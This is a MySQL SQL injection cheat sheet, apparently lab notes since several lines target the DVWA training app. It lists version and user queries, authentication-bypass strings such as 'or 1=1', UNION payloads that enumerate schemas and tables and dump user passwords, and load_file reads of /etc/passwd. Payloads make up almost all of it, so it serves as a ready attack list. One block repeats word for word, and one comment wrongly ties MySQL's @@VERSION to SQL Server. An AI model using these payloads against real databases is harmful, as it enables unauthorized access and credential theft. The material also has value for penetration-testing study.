##MySQL
{
SELECT @@VERSION; — This command retrieves the system information of the current installation of SQL Server.
SELECT version(); — This command selects the specific version of a Server
}
{
blah' union select null,load_file('/etc/passwd'),3; — Malicious query used to interact with a target OS
}
{
SELECT user FROM mysql.user; — This command lists the column ‘user’ from the table ‘mysql.user’.
SELECT user(); — This command obtains the current MySQL user name and hostname.
SELECT system_user(); — This command obtains the current value of system_user
}
{
SELECT user FROM mysql.user; — This command lists the column ‘user’ from the table ‘mysql.user’.
SELECT user(); — This command obtains the current MySQL user name and hostname.
SELECT system_user(); — This command obtains the current value of system_user
}
{
blah' union select null,schema_name from information_schema.schemata# -- list all schema name
union select null,group_concat(table_name) from information_schema.tables where table_schema='schema_name' — list all table from schema value
}
{
admin' --
admin' #
admin'/*
' or 1=1—
' or 1=1#
' or 1=1/*
') or '1'='1—
') or ('1'='1--
}
{
-blah' or ' ' ='
-blah'union all select system_user(),user() #
-blah' union select 1,group_concat(user_id, ' ', user_username, ' ', user_password) from user#
-blah' union select null,schema_name from information_schema.schemata# -- list all schema name
-blah' union select null,group_concat(table_name) from information_schema.tables where table_schema='dvwa'#
-blah' union select null,table_name from information_schema.tables# -- list all table name
-blah' union select null,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='dvwa'#
-blah' union select null,group_concat(first_name, ' ', password) from users#
-blah' union select null,@@datadir #
-blah' union all select load_file(‘/etc/passwd’),null #
}